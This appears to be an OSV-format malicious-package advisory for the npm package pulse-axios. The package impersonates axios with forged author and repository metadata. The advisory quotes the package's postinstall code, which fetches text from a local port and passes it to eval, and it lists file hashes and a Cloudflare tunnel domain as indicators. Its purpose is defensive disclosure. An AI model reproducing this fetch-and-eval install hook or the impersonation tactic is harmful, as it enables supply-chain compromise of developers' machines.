{"id":"MAL-2026-4651","summary":"Malicious code in pulse-axios (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (c64dad53e23f7fcba3813e9ae6caee3f9461f5e52194165da668e5332e78bb99)\npulse-axios@1.16.1 declares a postinstall hook (`node./lib/core/eval.js`) that on `npm install` issues `fetch('http://localhost:3000/download/data')`, reads the response body as text, and passes it to `eval` inside an async IIFE: `await eval(\\`(async () =\u003e {\\n${datab2}\\n})();\\`)`. Errors are silently swallowed in an empty catch. Any bytes returned by whatever process is listening on port 3000 at install time — including any local attacker process, a co-installed malicious package's helper, or a developer-staging payload server — execute with the installer's privileges. The package additionally impersonates the legitimate `axios` package: `name: pulse-axios`, description claims to be \"a faster and better version of axios\", `author` is set to `Matt Zabriskie` (the real axios maintainer), `repository.url` points to `https://github.com/axios/axios.git`, and `homepage` is `https://axios-http.com`. The metadata theft is designed to fool installers into believing this is a legitimate axios variant. Combined, the package is a typosquat lure that ships an install-time RCE primitive.\n","modified":"2026-05-26T06:02:52.481799152Z","published":"2026-05-20T01:56:30Z","database_specific":{"malicious-packages-origins":[{"source":"amazon-inspector","id":"IN-MAL-2026-003766","modified_time":"2026-05-21T06:54:36Z","versions":["1.17.2"],"import_time":"2026-05-26T05:51:16.460920647Z","sha256":"28257d4309df99e3d275ee13a8070e9be516444fc5a5e954c864cbf7d7b1f89c"},{"source":"amazon-inspector","id":"IN-MAL-2026-003389","modified_time":"2026-05-20T02:00:14Z","versions":["1.17.1"],"import_time":"2026-05-26T05:50:32.977313736Z","sha256":"5697e55222985697b89b9d1755984516563ff0a30218ac331c34aee46f3f1d07"},{"source":"amazon-inspector","id":"IN-MAL-2026-003767","modified_time":"2026-05-21T06:54:36Z","versions":["1.17.2"],"import_time":"2026-05-26T05:51:16.556905649Z","sha256":"a04cbfa8262f2b1fc518a4124a825108b1895b24e6222a1306c57c136aa180a7"},{"source":"amazon-inspector","id":"IN-MAL-2026-003385","modified_time":"2026-05-20T01:56:30Z","versions":["1.16.1"],"import_time":"2026-05-26T05:50:32.522011889Z","sha256":"c64dad53e23f7fcba3813e9ae6caee3f9461f5e52194165da668e5332e78bb99"},{"source":"amazon-inspector","id":"IN-MAL-2026-003390","modified_time":"2026-05-20T02:00:14Z","versions":["1.17.1"],"import_time":"2026-05-26T05:50:33.070727028Z","sha256":"d53e7eba89c2c1763024ac4b829f4f12f5e5f901a407c4fc7b157417aec557f1"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/pulse-axios/v/1.17.2"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/pulse-axios/v/1.17.1"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/pulse-axios/v/1.16.1"}],"affected":[{"package":{"name":"pulse-axios","ecosystem":"npm","purl":"pkg:npm/pulse-axios"},"versions":["1.17.2","1.17.1","1.16.1"],"database_specific":{"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/pulse-axios/MAL-2026-4651.json","cwes":[{"name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506"},{"name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506"},{"name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506"}],"indicators":{"evidence_files":[{"tlsh":"21e026aa303f26754f7123f89d57180ff722b31b76c4c1c5f39486048e326a14945e5d","path":"lib/core/eval.js","sha256":"ec84bb94f37b0021bcea38c9b1e5c326dda236d4e9c83bfc11093e597d23a9fe"},{"tlsh":"b2d1ec73c9ca4d572fb47aa8a87a9264f231c30fa551c90fb07e024c4f7572f129762a","path":"package.json","sha256":"19649e1b8bf32423969ba39b72913c934844eb6a991ddc1a0493a3a243706dc9"}],"package_integrity":[{"filename":"pulse-axios-1.17.2.tgz","hashes":{"sha512_sri":"sha512-V65XeJl04Q9VAFB6bsNTktIN64Qiw/qc9LLj4m6UFRRUSzI+5eUP3s23lP8fXnwa8a2tsMToPZGCdq/sApsSig==","sha1":"f81c5e006cfe568db6d2524dca71a86c859d392b"}}],"domains":["consequences-faces-weblogs-clinical.trycloudflare.com"]}}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["actran@amazon.com"],"type":"FINDER"}]}